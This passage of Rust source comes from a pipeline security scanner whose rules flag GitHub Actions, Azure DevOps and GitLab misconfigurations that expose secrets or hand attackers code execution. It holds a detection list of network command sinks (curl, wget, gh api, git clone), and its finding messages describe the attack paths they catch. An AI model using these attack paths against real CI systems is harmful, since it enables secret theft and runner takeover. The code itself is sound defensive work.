3517                    category: FindingCategory::SetvariableIssecretFalse,
3518                    path: None,
3519                    nodes_involved: vec![step.id],
3520                    message: format!(
3521                        "ADO setvariable with sensitive name '{}' uses issecret=false or omits issecret flag, value printed in plaintext logs",
3522                        orig_name,
3523                    ),
3524                    recommendation: Recommendation::Manual {
3525                        action: format!(
3526                            "Add `issecret=true` to the setvariable directive: `##vso[task.setvariable variable={};issecret=true]`",
3527                            orig_name,
3528                        ),
3529                    },
3530                    source: FindingSource::BuiltIn,
3531                    extras: FindingExtras::default(),
3532                });
3533            }
3534
3535            cursor = start + name_end;
3536        }
3537    }
3538
3539    findings
3540}
3541
/// Run all rules against a graph.
///
/// Every built-in rule is invoked once, in the fixed order listed below, and
/// its findings are appended to one list. `max_hops` is forwarded only to
/// `authority_propagation`; every other rule takes just the graph.
///
/// Post-processing, in order:
/// 1. findings with an identical `(category, nodes_involved, message)` key
///    are collapsed to the first occurrence;
/// 2. `apply_compensating_controls` is run over the remaining findings;
/// 3. the list is sorted by `severity` (`sort_by_key` is a stable sort, so
///    findings of equal severity keep the rule order above).
pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
    let mut findings = Vec::new();
    // MVP rules
    findings.extend(authority_propagation(graph, max_hops));
    findings.extend(over_privileged_identity(graph));
    findings.extend(unpinned_action(graph));
    findings.extend(untrusted_with_authority(graph));
    findings.extend(artifact_boundary_crossing(graph));
    // Stretch rules
    findings.extend(long_lived_credential(graph));
    findings.extend(floating_image(graph));
    findings.extend(persisted_credential(graph));
    findings.extend(trigger_context_mismatch(graph));
    findings.extend(cross_workflow_authority_chain(graph));
    findings.extend(authority_cycle(graph));
    findings.extend(uplift_without_attestation(graph));
    findings.extend(self_mutating_pipeline(graph));
    findings.extend(checkout_self_pr_exposure(graph));
    findings.extend(variable_group_in_pr_job(graph));
    findings.extend(self_hosted_pool_pr_hijack(graph));
    findings.extend(shared_self_hosted_pool_no_isolation(graph));
    findings.extend(service_connection_scope_mismatch(graph));
    findings.extend(template_extends_unpinned_branch(graph));
    findings.extend(template_repo_ref_is_feature_branch(graph));
    findings.extend(vm_remote_exec_via_pipeline_secret(graph));
    findings.extend(short_lived_sas_in_command_line(graph));
    // ADO inline-script secret-leak rules
    findings.extend(secret_to_inline_script_env_export(graph));
    findings.extend(secret_materialised_to_workspace_file(graph));
    findings.extend(keyvault_secret_to_plaintext(graph));
    findings.extend(setvariable_issecret_false(graph));
    findings.extend(terraform_auto_approve_in_prod(graph));
    findings.extend(addspn_with_inline_script(graph));
    findings.extend(parameter_interpolation_into_shell(graph));
    // GHA red-team-derived rules
    findings.extend(runtime_script_fetched_from_floating_url(graph));
    findings.extend(pr_trigger_with_floating_action_ref(graph));
    findings.extend(check_homoglyph_in_action_ref(graph));
    findings.extend(untrusted_api_response_to_env_sink(graph));
    findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
    findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
    // Blue-team positive invariants (negative-space rules — fire on absence
    // of expected defenses)
    findings.extend(no_workflow_level_permissions_block(graph));
    findings.extend(prod_deploy_job_no_environment_gate(graph));
    findings.extend(long_lived_secret_without_oidc_recommendation(graph));
    findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
    findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
    findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
    // GHA council Bucket 1 rules
    findings.extend(risky_trigger_with_authority(graph));
    findings.extend(sensitive_value_in_job_output(graph));
    findings.extend(manual_dispatch_input_to_url_or_command(graph));
    // GHA council Bucket 2 rules
    findings.extend(secrets_inherit_overscoped_passthrough(graph));
    findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
    // GHA council Bucket 3 rules
    findings.extend(script_injection_via_untrusted_context(graph));
    findings.extend(interactive_debug_action_in_authority_workflow(graph));
    findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
    findings.extend(gh_cli_with_default_token_escalating(graph));
    // GitLab council Bucket A rules
    findings.extend(ci_job_token_to_external_api(graph));
    findings.extend(id_token_audience_overscoped(graph));
    findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
    // GitLab council Bucket B+C rules
    findings.extend(unpinned_include_remote_or_branch_ref(graph));
    findings.extend(dind_service_grants_host_authority(graph));
    findings.extend(security_job_silently_skipped(graph));
    findings.extend(child_pipeline_trigger_inherits_authority(graph));
    findings.extend(cache_key_crosses_trust_boundary(graph));
    // GitLab red-team Group D rules
    findings.extend(pat_embedded_in_git_remote_url(graph));
    findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
        graph,
    ));
    findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));

    // Deduplicate structurally identical findings BEFORE compensating controls.
    // Order matters: compensating controls append to finding messages (e.g.
    // " [compensating control: ...]"), so deduping after them would fail to
    // collapse two BFS-duplicate findings where one CC-modified and the other
    // did not. Key on (category, nodes_involved, message) so distinct
    // per-variable findings on the same step are preserved.
    let mut seen_keys: std::collections::HashSet<(FindingCategory, Vec<NodeId>, String)> =
        std::collections::HashSet::new();
    findings
        .retain(|f| seen_keys.insert((f.category, f.nodes_involved.clone(), f.message.clone())));

    // Blue-team compensating-control suppressions (downgrade or suppress
    // existing-rule findings when a control elsewhere in the graph
    // neutralises the risk). Applied after dedup so each unique finding
    // gets exactly one CC evaluation.
    apply_compensating_controls(graph, &mut findings);

    findings.sort_by_key(|f| f.severity);

    findings
}
3641
// ── R3: risky_trigger_with_authority ────────────────────
// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
// `workflow_run` are high-blast-radius triggers — anyone able to comment on
// an issue (or any contributor whose previous workflow run completed) can
// fire the workflow with secrets in scope. `trigger_context_mismatch` only
// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.

/// Trigger names that confer the same effective blast radius as
/// `pull_request_target` once they're paired with write permissions or
/// non-`GITHUB_TOKEN` secrets. Order is alphabetical for stable output.
///
/// Each entry is a plain event name as it appears in the comma-joined
/// `META_TRIGGERS` list of triggers declared under `on:`.
const RISKY_TRIGGERS: &[&str] = &[
    "issue_comment",
    "pull_request_review",
    "pull_request_review_comment",
    "workflow_run",
];
3658
/// Reports whether a rendered permissions string carries a write grant.
///
/// The input is lower-cased and then searched for either marker:
/// - `write-all` — the unscoped grant, always flagged;
/// - `: write` — the tail of any scoped grant such as `contents: write`,
///   `pull-requests: write` or `id-token: write`.
///
/// This is a plain substring search, so a grant rendered without the space
/// after the colon (`contents:write`) is not recognised.
fn permissions_grant_writes(perm_string: &str) -> bool {
    const WRITE_MARKERS: [&str; 2] = ["write-all", ": write"];

    let normalized = perm_string.to_lowercase();
    WRITE_MARKERS
        .iter()
        .any(|marker| normalized.contains(*marker))
}
3668
3669/// Rule: high-blast-radius trigger (`issue_comment`,
3670/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
3671/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
3672///
3673/// Detection (deterministic, no path traversal):
3674/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
3675///    trigger declared under `on:`.
3676/// 2. Filter for entries in `RISKY_TRIGGERS`.
3677/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
3678///    grants `: write` or `write-all`, the workflow holds write authority.
3679/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
3680///    counts as a non-default secret in scope.
3681/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
3682///
3683/// Severity: High. The blast radius matches `pull_request_target` but the
3684/// trigger surface is broader (anyone with comment access vs. only PR
3685/// authors), so this rule never downgrades by trigger type.
3686pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
3687    let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
3688        Some(t) => t,
3689        None => return Vec::new(),
3690    };
3691
3692    let risky_present: Vec<&str> = triggers_meta
3693        .split(',')
3694        .map(str::trim)
3695        .filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
3696        .collect();
3697
3698    if risky_present.is_empty() {
3699        return Vec::new();
3700    }
3701
3702    // (3) Any Identity node with write permissions?
3703    let mut writes_identities: Vec<NodeId> = Vec::new();
3704    for ident in graph.nodes_of_kind(NodeKind::Identity) {
3705        if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
3706            if permissions_grant_writes(perms) {
3707                writes_identities.push(ident.id);
3708            }
3709        }
3710    }
3711
3712    // (4) Any non-GITHUB_TOKEN secret in scope?
3713    let non_default_secrets: Vec<NodeId> = graph
3714        .nodes_of_kind(NodeKind::Secret)
3715        .filter(|s| s.name != "GITHUB_TOKEN")
3716        .map(|s| s.id)
3717        .collect();
3718
3719    if writes_identities.is_empty() && non_default_secrets.is_empty() {
3720        return Vec::new();
3721    }
3722
3723    let trigger_label = risky_present.join(", ");
3724    let cause = if !writes_identities.is_empty() && !non_default_secrets.is_empty() {
3725        format!(
3726            "{} write-grant identit{} and {} non-default secret{}",
3727            writes_identities.len(),
3728            if writes_identities.len() == 1 {
3729                "y"
3730            } else {
3731                "ies"
3732            },
3733            non_default_secrets.len(),
3734            if non_default_secrets.len() == 1 {
3735                ""
3736            } else {
3737                "s"
3738            },
3739        )
3740    } else if !writes_identities.is_empty() {
3741        format!(
3742            "{} write-grant identit{}",
3743            writes_identities.len(),
3744            if writes_identities.len() == 1 {
3745                "y"
3746            } else {
3747                "ies"
3748            },
3749        )
3750    } else {
3751        format!(
3752            "{} non-default secret{}",
3753            non_default_secrets.len(),
3754            if non_default_secrets.len() == 1 {
3755                ""
3756            } else {
3757                "s"
3758            },
3759        )
3760    };
3761
3762    let mut nodes_involved = writes_identities.clone();
3763    nodes_involved.extend(non_default_secrets);
3764
3765    vec![Finding {
3766        severity: Severity::High,
3767        category: FindingCategory::RiskyTriggerWithAuthority,
3768        path: None,
3769        nodes_involved,
3770        message: format!(
3771            "Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
3772        ),
3773        recommendation: Recommendation::Manual {
3774            action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
3775        },
3776        source: FindingSource::BuiltIn,
3777        extras: FindingExtras::default(),
3778    }]
3779}
3780
3781// ── R4: sensitive_value_in_job_output ───────────────────
3782// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
3783// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
3784// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
3785// giving it a credential-shaped name is a structural leak.
3786
/// Suffixes that mark a job-output name as credential-shaped. Compared
/// against the end of the lower-cased output name, so every entry here must
/// itself be lower-case.
const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
    "_token",
    "_secret",
    "_key",
    "_pem",
    "_password",
    "_credential",
    "_credentials",
    "_api_key",
];

/// Reports whether `name`, compared case-insensitively, ends with one of
/// `CREDENTIAL_NAME_SUFFIXES`.
///
/// Every suffix starts with `_`, so a bare `token` or a hyphenated
/// `api-key` is not considered credential-shaped.
fn output_name_is_credential_shaped(name: &str) -> bool {
    let folded = name.to_lowercase();
    for suffix in CREDENTIAL_NAME_SUFFIXES {
        if folded.ends_with(*suffix) {
            return true;
        }
    }
    false
}
3806
3807/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
3808/// OIDC-bearing step output, or has a credential-shaped name (suffix
3809/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
3810/// `_credential[s]` / `_api_key`).
3811///
3812/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
3813/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
3814/// when `source != "literal"` OR `name` matches a credential suffix.
3815///
3816/// Severity:
3817/// - **Critical** when `source == "secret"` (raw `secrets.*` value).
3818/// - **Critical** when `source == "oidc"` (OIDC token leaked via output).
3819/// - **High** when `source == "step_output"` AND name is credential-shaped.
3820/// - **High** when `source == "literal"` AND name is credential-shaped
3821///   (developer is signaling credential intent in the API).
3822/// - Otherwise no finding.
3823pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
3824    let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
3825        Some(s) if !s.is_empty() => s,
3826        _ => return Vec::new(),
3827    };
3828
3829    let mut findings = Vec::new();
3830
3831    for record in raw.split('|') {
3832        // Format: "<job>\t<name>\t<source>"
3833        let mut fields = record.splitn(3, '\t');
3834        let job = match fields.next() {
3835            Some(j) if !j.is_empty() => j,
3836            _ => continue,
3837        };
3838        let name = match fields.next() {
3839            Some(n) if !n.is_empty() => n,
3840            _ => continue,
3841        };
3842        let source = fields.next().unwrap_or("literal");
3843
3844        let credential_named = output_name_is_credential_shaped(name);
3845
3846        let (severity, reason) = match source {
3847            "secret" => (
3848                Severity::Critical,
3849                "value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
3850            ),
3851            "oidc" => (
3852                Severity::Critical,
3853                "value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
3854            ),
3855            "step_output" if credential_named => (
3856                Severity::High,
3857                "credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
3858            ),
3859            "literal" if credential_named => (
3860                Severity::High,
3861                "credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
3862            ),
3863            _ => continue,
3864        };
3865
3866        findings.push(Finding {
3867            severity,
3868            category: FindingCategory::SensitiveValueInJobOutput,
3869            path: None,
3870            nodes_involved: Vec::new(),
3871            message: format!(
3872                "Job '{job}' declares output '{name}' — {reason}"
3873            ),
3874            recommendation: Recommendation::Manual {
3875                action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
3876            },
3877            source: FindingSource::BuiltIn,
3878            extras: FindingExtras::default(),
3879        });
3880    }
3881
3882    findings
3883}
3884
3885// ── R6: manual_dispatch_input_to_url_or_command ────────
3886// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
3887// where collaborators have `Actions: write`. Flowing an input value into
3888// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
3889// gives the dispatcher arbitrary code execution against the runner — a
3890// pivot from "can run a workflow" to "can land arbitrary code on a
3891// privileged runner".
3892
/// Tokens that indicate command-line consumption of an input value when
/// they appear in the same `run:` body as the input expression. Each token
/// must be matched whole-word so we don't false-positive on `curlier` etc.
///
/// Multi-word entries such as `gh api` are written with a single space.
/// `manual_dispatch_input_to_url_or_command` passes each entry verbatim to
/// `body_contains_command` and lists the matching entries in the order
/// they appear here.
const COMMAND_SINKS: &[&str] = &[
    "curl",
    "wget",
    "gh api",
    "gh release",
    "gh secret",
    "gh repo",
    "git clone",
    "git fetch",
];
3906
/// Returns true if `body` contains a whole-word occurrence of `needle`.
///
/// "Whole word" means the occurrence is preceded by start-of-string or a
/// byte that is not an ASCII letter, digit or `_`, and followed by
/// end-of-string or such a byte. This avoids matching `curl` inside
/// `curlier` or `my_curl`, and `git fetch` inside `git fetcher`. The check
/// is byte-based, so a neighbouring non-ASCII character counts as a
/// boundary.
///
/// An empty `needle` never matches. Every occurrence is examined, including
/// ones that overlap a previously rejected occurrence.
fn body_contains_command(body: &str, needle: &str) -> bool {
    // An empty needle would match at every offset without ever advancing the
    // scan; treat it as "not present" instead of looping forever.
    let Some(first_char) = needle.chars().next() else {
        return false;
    };
    // After a rejected hit, move past only its first character so overlapping
    // occurrences are still considered. The hit starts with `first_char`, so
    // this offset is always a char boundary in `body`.
    let advance = first_char.len_utf8();

    let bytes = body.as_bytes();
    let is_word_byte = |b: Option<&u8>| {
        matches!(b, Some(b) if b.is_ascii_alphanumeric() || *b == b'_')
    };

    let mut start = 0;
    while let Some(rel) = body[start..].find(needle) {
        let abs = start + rel;
        let before = abs.checked_sub(1).and_then(|i| bytes.get(i));
        let after = bytes.get(abs + needle.len());
        if !is_word_byte(before) && !is_word_byte(after) {
            return true;
        }
        start = abs + advance;
    }
    false
}
3935
/// Returns true if `body` references the dispatch input `name` as
/// `inputs.<name>`. Because `github.event.inputs.<name>` contains that same
/// text, both spellings GitHub Actions accepts are covered by one search.
///
/// The reference must stand on its own: the byte before `inputs` and the
/// byte after `<name>` must not be an ASCII letter, digit, `_` or `-`.
/// This keeps input `ref` from matching `inputs.ref_name`,
/// `inputs.ref-name` or `myinputs.ref`. A preceding `.` is allowed, which is
/// what admits the `github.event.inputs.` form.
///
/// The surrounding `${{ … }}` delimiters are not inspected. An empty `name`
/// never matches.
fn body_references_input(body: &str, name: &str) -> bool {
    if name.is_empty() {
        return false;
    }

    let needle = format!("inputs.{name}");
    let bytes = body.as_bytes();
    let is_ident_byte = |b: Option<&u8>| {
        matches!(b, Some(b) if b.is_ascii_alphanumeric() || matches!(*b, b'_' | b'-'))
    };

    let mut from = 0;
    while let Some(rel) = body[from..].find(needle.as_str()) {
        let at = from + rel;
        let before = at.checked_sub(1).and_then(|i| bytes.get(i));
        let after = bytes.get(at + needle.len());
        if !is_ident_byte(before) && !is_ident_byte(after) {
            return true;
        }
        // The hit begins with the one-byte `i` of `inputs`, so stepping one
        // byte keeps `from` on a char boundary while still examining any
        // later occurrence.
        from = at + 1;
    }
    false
}
3945
3946/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
3947/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
3948/// `with.ref:`.
3949///
3950/// Detection:
3951/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
3952/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
3953///    the body references any input name AND contains a whole-word
3954///    occurrence of any `COMMAND_SINKS` entry.
3955/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
3956///    the ref expression references any input name (the ref is consumed by
3957///    `actions/checkout`, which performs `git fetch` / `git checkout`
3958///    against the supplied ref).
3959///
3960/// Severity: High. Dispatch is a privileged operation, but the privileged
3961/// surface is bounded to whoever holds `Actions: write` on the repo —
3962/// narrower than `pull_request_target`, broader than a maintainer-only
3963/// secret.
3964pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
3965    let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
3966        Some(s) if !s.is_empty() => s,
3967        _ => return Vec::new(),
3968    };
3969
3970    let inputs: Vec<&str> = inputs_meta
3971        .split(',')
3972        .map(str::trim)
3973        .filter(|s| !s.is_empty())
3974        .collect();
3975    if inputs.is_empty() {
3976        return Vec::new();
3977    }
3978
3979    let mut findings = Vec::new();
3980
3981    for step in graph.nodes_of_kind(NodeKind::Step) {
3982        // (a) Script body sink
3983        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
3984            let referenced: Vec<&str> = inputs
3985                .iter()
3986                .copied()
3987                .filter(|name| body_references_input(body, name))
3988                .collect();
3989            if !referenced.is_empty() {
3990                let sinks: Vec<&str> = COMMAND_SINKS
3991                    .iter()
3992                    .copied()
3993                    .filter(|s| body_contains_command(body, s))
3994                    .collect();
3995                if !sinks.is_empty() {
3996                    findings.push(Finding {
3997                        severity: Severity::High,
3998                        category: FindingCategory::ManualDispatchInputToUrlOrCommand,
3999                        path: None,
4000                        nodes_involved: vec![step.id],
4001                        message: format!(
4002                            "Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
4003                            step.name,
4004                            referenced.join(", "),
4005                            sinks.join(", "),
4006                        ),
4007                        recommendation: Recommendation::Manual {
4008                            action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
4009                        },
4010                        source: FindingSource::BuiltIn,
4011                        extras: FindingExtras::default(),
4012                    });
4013                }
4014            }
4015        }
4016
4017        // (b) actions/checkout ref sink
4018        if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
4019            let referenced: Vec<&str> = inputs
4020                .iter()
4021                .copied()
4022                .filter(|name| body_references_input(ref_expr, name))
4023                .collect();
4024            if !referenced.is_empty() {
4025                findings.push(Finding {
4026                    severity: Severity::High,
4027                    category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4028                    path: None,
4029                    nodes_involved: vec![step.id],
4030                    message: format!(
4031                        "Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
4032                        step.name,
4033                        referenced.join(", "),
4034                    ),
4035                    recommendation: Recommendation::Manual {
4036                        action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
4037                    },
4038                    source: FindingSource::BuiltIn,
4039                    extras: FindingExtras::default(),
4040                });
4041            }
4042        }
4043    }
4044
4045    findings
4046}
/// Set of trigger names whose runs are influenced by parties outside the
/// repo's write-permission set — anything that can be initiated by opening a
/// PR, commenting on an issue, or reacting to another workflow's outcome.
///
/// Consulted by `graph_has_risky_trigger` and `first_risky_trigger`, which
/// `secrets_inherit_overscoped_passthrough` uses to gate detection and to
/// name the trigger in its message.
// NOTE(review): an earlier version of this comment also listed
// `unsafe_pr_artifact_in_workflow_run_consumer` as a user, but that rule
// appears to do its own `workflow_run` / `pull_request_target` check —
// confirm before relying on this list for it.
const RISKY_TRIGGER_NAMES: &[&str] = &[
    "pull_request",
    "pull_request_target",
    "pull_request_review",
    "pull_request_review_comment",
    "issue_comment",
    "workflow_run",
];
4060
4061/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
4062/// matches a risky trigger.
4063fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
4064    let Some(triggers) = graph.metadata.get(META_TRIGGERS) else {
4065        return false;
4066    };
4067    triggers
4068        .split(',')
4069        .any(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4070}
4071
4072/// Returns the first risky trigger name present on the graph, for messaging.
4073fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
4074    let triggers = graph.metadata.get(META_TRIGGERS)?;
4075    triggers
4076        .split(',')
4077        .find(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4078        .map(|s| s.trim().to_string())
4079}
4080
4081/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
4082///
4083/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
4084/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
4085/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
4086/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
4087///
4088/// `secrets: inherit` forwards the entire caller secret bag to the callee
4089/// regardless of which secrets the callee actually consumes. Combined with a
4090/// trigger an external party can fire, every secret in scope is one
4091/// compromised callee away from exfiltration.
4092pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
4093    if !graph_has_risky_trigger(graph) {
4094        return Vec::new();
4095    }
4096    let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
4097
4098    let mut findings = Vec::new();
4099    for step in graph.nodes_of_kind(NodeKind::Step) {
4100        let inherits = step
4101            .metadata
4102            .get(META_SECRETS_INHERIT)
4103            .map(|v| v == "true")
4104            .unwrap_or(false);
4105        if !inherits {
4106            continue;
4107        }
4108
4109        // Find the reusable workflow target the step delegates to (if any) so
4110        // the message can name the callee.
4111        let target_name = graph
4112            .edges_from(step.id)
4113            .filter(|e| e.kind == EdgeKind::DelegatesTo)
4114            .filter_map(|e| graph.node(e.to))
4115            .find(|n| n.kind == NodeKind::Image)
4116            .map(|n| n.name.clone())
4117            .unwrap_or_else(|| "<unknown>".into());
4118
4119        findings.push(Finding {
4120            severity: Severity::High,
4121            category: FindingCategory::SecretsInheritOverscopedPassthrough,
4122            path: None,
4123            nodes_involved: vec![step.id],
4124            message: format!(
4125                "Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
4126                step.name, target_name, trigger
4127            ),
4128            recommendation: Recommendation::Manual {
4129                action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
4130            },
4131            source: FindingSource::BuiltIn,
4132            extras: FindingExtras::default(),
4133        });
4134    }
4135
4136    findings
4137}
4138
4139/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
4140/// artifact AND interprets its content into a privileged sink.
4141///
4142/// Requires:
4143/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
4144///    ran in PR context, so the artifact is attacker-controlled).
4145/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
4146/// 3. At least one Step in the *same job* carries
4147///    `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
4148///    `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
4149///
4150/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
4151/// trust crossings on Artifact nodes; this rule additionally requires the
4152/// consumer interprets the downloaded content.
4153pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4154    // Trigger gate: workflow_run consumers and pull_request_target both run
4155    // in upstream-repo context with elevated permissions while the artifact
4156    // (or PR head ref) originates from PR context.
4157    let triggers_ok = {
4158        let single = graph
4159            .metadata
4160            .get(META_TRIGGER)
4161            .map(|s| s == "workflow_run" || s == "pull_request_target")
4162            .unwrap_or(false);
4163        let multi = graph
4164            .metadata
4165            .get(META_TRIGGERS)
4166            .map(|s| {
4167                s.split(',')
4168                    .any(|t| t.trim() == "workflow_run" || t.trim() == "pull_request_target")
4169            })
4170            .unwrap_or(false);
4171        single || multi
4172    };
4173    if !triggers_ok {
4174        return Vec::new();
4175    }
4176
4177    // Group steps by job name so we can pair download + interpret within a job.
4178    use std::collections::BTreeMap;
4179    let mut by_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
4180    for step in graph.nodes_of_kind(NodeKind::Step) {
4181        let job = step
4182            .metadata
4183            .get(META_JOB_NAME)
4184            .cloned()
4185            .unwrap_or_default();
4186        let entry = by_job.entry(job).or_default();
4187        if step
4188            .metadata
4189            .get(META_DOWNLOADS_ARTIFACT)
4190            .map(|v| v == "true")
4191            .unwrap_or(false)
4192        {
4193            entry.0.push(step.id);
4194        }
4195        if step
4196            .metadata
4197            .get(META_INTERPRETS_ARTIFACT)
4198            .map(|v| v == "true")
4199            .unwrap_or(false)
4200        {
4201            entry.1.push(step.id);
4202        }
4203    }
4204
4205    let mut findings = Vec::new();
4206    for (job, (downloaders, interpreters)) in by_job {
4207        if downloaders.is_empty() || interpreters.is_empty() {
4208            continue;
4209        }
4210        let mut nodes_involved = downloaders.clone();
4211        nodes_involved.extend(interpreters.iter().copied());
4212
4213        let job_label = if job.is_empty() {
4214            "<workflow-level>".to_string()
4215        } else {
4216            job
4217        };
4218
4219        findings.push(Finding {
4220            severity: Severity::High,
4221            category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
4222            path: None,
4223            nodes_involved,
4224            message: format!(
4225                "Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
4226                job_label
4227            ),
4228            recommendation: Recommendation::Manual {
4229                action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
4230            },
4231            source: FindingSource::BuiltIn,
4232            extras: FindingExtras::default(),
4233        });
4234    }
4235
4236    findings
4237}
4238
4239// ── GHA security rules from corpus gap analysis ─────────────────────────
4240//
4241// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
4242// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
4243// step-level metadata stamped by the GHA parser (R5, R9). They gate on
4244// META_TRIGGERS where a specific trigger surface is required.
4245
/// Reports whether `triggers_csv` — the comma-separated `META_TRIGGERS`
/// value — contains any name listed in `wanted`.
///
/// Each entry is trimmed before it is compared, so stray whitespace around
/// commas is tolerated. `None` yields `false`.
fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
    match triggers_csv {
        Some(csv) => csv.split(',').any(|entry| wanted.contains(&entry.trim())),
        None => false,
    }
}
4257
/// Locates every `${{ ... }}` expression inside `body`.
///
/// Each result pairs the trimmed inner expression text with the byte range
/// of the whole expression, from the `$` through the closing `}}`, so
/// callers can inspect the surrounding context. Scanning resumes right after
/// each closing `}}`; an opening `${{` with no later `}}` ends the scan.
/// Nested `}}` is not handled — the first `}}` after an opener closes it.
fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
    const OPEN: &str = "${{";
    const CLOSE: &str = "}}";

    let mut found = Vec::new();
    let mut offset = 0usize;
    loop {
        let Some(open) = body[offset..].find(OPEN).map(|rel| offset + rel) else {
            return found;
        };
        let inner_from = open + OPEN.len();
        let Some(inner_to) = body[inner_from..]
            .find(CLOSE)
